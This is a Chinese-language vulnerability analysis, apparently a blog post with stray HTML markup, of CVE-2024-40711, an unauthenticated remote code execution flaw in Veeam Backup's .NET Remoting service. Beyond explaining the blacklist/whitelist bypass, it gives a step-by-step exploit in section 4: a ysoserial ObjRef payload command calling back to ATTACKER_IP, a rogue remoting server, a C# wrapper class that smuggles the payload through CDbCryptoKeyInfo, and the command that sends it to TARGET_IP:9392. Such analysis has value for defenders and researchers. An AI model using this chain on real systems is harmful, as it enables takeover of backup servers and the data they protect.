.NET Remoting 漏洞分析与利用：Veeam Backup RCE (CVE-2024-40711) 深度解析<\/h1>

1. 前置知识<\/h2>

1.1 .NET Remoting 基础<\/h3>

.NET Remoting 是微软提供的一种分布式对象通信机制，允许应用程序跨应用程序域、进程或计算机边界进行通信。关键组件包括：<\/p>

Channel<\/strong>：通信通道（如 TCP、HTTP）<\/li>
Formatter<\/strong>：消息格式化器（如 BinaryFormatter、SoapFormatter）<\/li>

Sink<\/strong>：处理消息的组件链<\/li> <\/ul>
1.2 关键安全机制<\/h3>

TypeFilterLevel<\/strong>：控制反序列化时的类型安全级别

Low<\/code>：仅允许基本反序列化<\/li>
Full<\/code>：允许完全反序列化<\/li> <\/ul> <\/li>
SerializationBinder<\/strong>：控制哪些类型可以被反序列化<\/li> <\/ul> 2. 漏洞环境分析<\/h2> 2.1 Veeam Backup 服务架构<\/h3> 服务名称：Veeam.Backup.Service.exe<\/code><\/li> 监听端口：9392<\/li> 服务URI：tcp:\/\/IP:9392\/VeeamClientUpdateService<\/code><\/li> 认证机制：通过CConnectionInterceptor<\/code>实现<\/li> <\/ul> 2.2 通信栈分析<\/h3> 服务端sink处理链：<\/p> TcpServerTransportSink → CBinaryServerFormatterSink → DispatchChannelSink <\/code><\/pre> 2.3 关键组件<\/h3> Channel注册<\/strong>：<\/li> <\/ol> private<\/span> static<\/span> TcpServerChannel RegisterChannel(Dictionary<string<\/span>, string<\/span>> channelProperties, <\/span><\/span> IServerChannelSinkProvider sinkProvider, CConnectionInterceptor connectionInterceptor) <\/span><\/span>{ <\/span><\/span> TcpServerChannel tcpServerChannel = new<\/span> TcpServerChannel(channelProperties, sinkProvider, connectionInterceptor); <\/span><\/span> tcpServerChannel.IsSecured = true<\/span>; \/\/ 开启认证<\/span> <\/span><\/span> ChannelServices.RegisterChannel(tcpServerChannel, true<\/span>); <\/span><\/span> return<\/span> tcpServerChannel; <\/span><\/span>} <\/span><\/span><\/code><\/pre> Sink Provider链构造<\/strong>：<\/li> <\/ol> private<\/span> static<\/span> IServerChannelSinkProvider GetSinkProvider(bool<\/span> enableRemotingPerfLog, bool<\/span> requireBasicPermission, <\/span><\/span> [CanBeNull]<\/span> IActivityMonitor monitor, [CanBeNull] IImpersonationProvider impersonation, <\/span><\/span> [CanBeNull]<\/span> IAccessCheckProvider accessCheckerProvider, [CanBeNull] IMfaProvider mfaProvider) <\/span><\/span>{ <\/span><\/span> IServerChannelSinkProvider serverChannelSinkProvider = <\/span><\/span> new<\/span> CBinaryServerFormatterSinkProvider(enableRemotingPerfLog, requireBasicPermission, <\/span><\/span> accessCheckerProvider, mfaProvider); <\/span><\/span> <\/span><\/span> if<\/span> (monitor != null<\/span>) <\/span><\/span> serverChannelSinkProvider = new<\/span> CActivityMonitorServerSinkProvider(monitor, serverChannelSinkProvider); <\/span><\/span> <\/span><\/span> if<\/span> (impersonation != null<\/span>) <\/span><\/span> serverChannelSinkProvider = new<\/span> CImpersonationServerSinkProvider(impersonation, serverChannelSinkProvider); <\/span><\/span> <\/span><\/span> return<\/span> serverChannelSinkProvider; <\/span><\/span>} <\/span><\/span><\/code><\/pre>3. 漏洞原理分析<\/h2> 3.1 反序列化流程<\/h3> 关键反序列化方法：<\/p> private<\/span> static<\/span> IMessage DeserializeBinaryRequestMessage(Stream requestStream, ITransportHeaders requestHeaders) <\/span><\/span>{ <\/span><\/span> IMessage message; <\/span><\/span> try<\/span> { <\/span><\/span> message = (IMessage)CBinaryServerFormatterSink.CreateFormatter(false<\/span>) <\/span><\/span> .DeserializeMethodResponse(requestStream, <\/span><\/span> new<\/span> HeaderHandler(new<\/span> CBinaryServerFormatterSink.UriHeaderHandler(requestHeaders).HeaderHandler), null<\/span>); <\/span><\/span> } finally<\/span> { <\/span><\/span> requestStream.Close(); <\/span><\/span> } <\/span><\/span> return<\/span> message; <\/span><\/span>} <\/span><\/span><\/code><\/pre>3.2 安全机制分析<\/h3> RestrictedSerializationBinder<\/strong>：提供白名单\/黑名单两种模式<\/li> 关键校验方法：<\/li> <\/ul> <\/li> <\/ol> private<\/span> void<\/span> EnsureTypeIsAllowed(ValueTuple<string<\/span>, string<\/span>> key) <\/span><\/span>{ <\/span><\/span> if<\/span> (!this<\/span>._serializingResponse && SOptions.Instance.ShouldWhitelistingRemoting) { <\/span><\/span> this<\/span>.EnsuredBlackWhitelistsAreLoaded(); <\/span><\/span> string<\/span> text = key.Item2 + ", "<\/span> + key.Item1; <\/span><\/span> if<\/span> (this<\/span>._mode == RestrictedSerializationBinder.Modes.FilterByWhitelist) { <\/span><\/span> RestrictedSerializationBinder._allowedTypeFullnames.EnsureIsAllowed(text); <\/span><\/span> return<\/span>; <\/span><\/span> } <\/span><\/span> if<\/span> (this<\/span>._mode == RestrictedSerializationBinder.Modes.FilterByBlacklist) { <\/span><\/span> RestrictedSerializationBinder._notAllowedTypeFullnames.EnsureIsAllowed(text); <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre> 漏洞点<\/strong>：存在一处使用黑名单模式的反序列化调用：<\/li> <\/ul> <\/li> <\/ol> public<\/span> static<\/span> T Deserialize<T>(string<\/span> input) <\/span><\/span>{ <\/span><\/span> T t; <\/span><\/span> try<\/span> { <\/span><\/span> byte<\/span>[] array = Convert.FromBase64String(input); <\/span><\/span> BinaryFormatter binaryFormatter = new<\/span> BinaryFormatter { <\/span><\/span> Binder = new<\/span> RestrictedSerializationBinder(false<\/span>, RestrictedSerializationBinder.Modes.FilterByBlacklist) <\/span><\/span> }; <\/span><\/span> t = CProxyBinaryFormatter.BinaryDeserializeObject<T>(array, binaryFormatter); <\/span><\/span> } <\/span><\/span> \/\/ ...<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>3.3 利用链构造<\/h3> ObjRef链<\/strong>：<\/p> 仅反序列化System.Runtime.Remoting.ObjRef<\/code>和System.Exception<\/code><\/li> 可绕过黑名单检查<\/li> <\/ul> <\/li> 跳板类<\/strong>：<\/p> 白名单中的CDbCryptoKeyInfo<\/code>类调用了黑名单模式的Deserialize<\/code>方法：<\/li> <\/ul> <\/li> <\/ol> this<\/span>._repairRecs = CProxyBinaryFormatter.Deserialize<CRepairRec>( <\/span><\/span> (string<\/span>[])info.GetValue("RepairRecs"<\/span>, typeof<\/span>(string<\/span>[]))).ToList<CRepairRec>(); <\/span><\/span><\/code><\/pre>4. 漏洞利用实战<\/h2> 4.1 工具准备<\/h3> ExploitRemotingService<\/strong>：修改版绕过认证<\/li> ysoserial.net<\/strong>：生成Payload<\/li> <\/ol> 4.2 利用步骤<\/h3> 生成ObjRef Payload<\/strong>：<\/li> <\/ol> ysoserial.exe -g ObjRef -f BinaryFormatter -c "http:\/\/ATTACKER_IP:2345\/aaa"<\/span> <\/span><\/span><\/code><\/pre> 创建恶意服务器<\/strong>：<\/li> <\/ol> RogueRemotingServer.exe --wrapSoapPayload http:\/\/0.0.0.0:2345\/aaa exploit.soapformatter <\/span><\/span><\/code><\/pre> 构造CDbCryptoKeyInfo包装类<\/strong>：<\/li> <\/ol> [Serializable]<\/span> <\/span><\/span>public<\/span> class<\/span> CDbCryptoKeyInfoWrapper<\/span> : ISerializable <\/span><\/span>{ <\/span><\/span> private<\/span> string<\/span>[] _fakeList; <\/span><\/span> <\/span><\/span> public<\/span> CDbCryptoKeyInfoWrapper(string<\/span>[] _fakeList) { <\/span><\/span> this<\/span>._fakeList = _fakeList; <\/span><\/span> } <\/span><\/span> <\/span><\/span> public<\/span> void<\/span> GetObjectData(SerializationInfo info, StreamingContext context) <\/span><\/span> { <\/span><\/span> info.SetType(typeof<\/span>(CDbCryptoKeyInfo)); <\/span><\/span> info.AddValue("Id"<\/span>, Guid.NewGuid()); <\/span><\/span> info.AddValue("KeySetId"<\/span>, null<\/span>); <\/span><\/span> info.AddValue("KeyType"<\/span>, 1<\/span>); <\/span><\/span> info.AddValue("Hint"<\/span>, "aaaaa"<\/span>); <\/span><\/span> info.AddValue("DecryptedKeyValue"<\/span>, "AAAA"<\/span>); <\/span><\/span> info.AddValue("LocaleLCID"<\/span>, 0x409<\/span>); <\/span><\/span> info.AddValue("ModificationDateUtc"<\/span>, new<\/span> DateTime()); <\/span><\/span> info.AddValue("CryptoAlg"<\/span>, 1<\/span>); <\/span><\/span> info.AddValue("RepairRecs"<\/span>, _fakeList); \/\/ 注入恶意Payload<\/span> <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre> 发送攻击Payload<\/strong>：<\/li> <\/ol> ExploitRemotingService.exe -s tcp:\/\/TARGET_IP:9392\/VeeamClientUpdateService raw BASE64_ENCODED_PAYLOAD <\/span><\/span><\/code><\/pre>5. 防御建议<\/h2> 升级到已修复版本<\/li> 限制网络访问，仅允许可信网络访问9392端口<\/li> 实施网络层防护措施<\/li> 监控异常反序列化活动<\/li> <\/ol> 6. 总结<\/h2> 该漏洞利用.NET Remoting服务中白名单与黑名单模式不一致的安全缺陷，通过精心构造的ObjRef链绕过安全限制，最终实现远程代码执行。攻击者无需认证即可利用此漏洞，危害性极高。<\/p>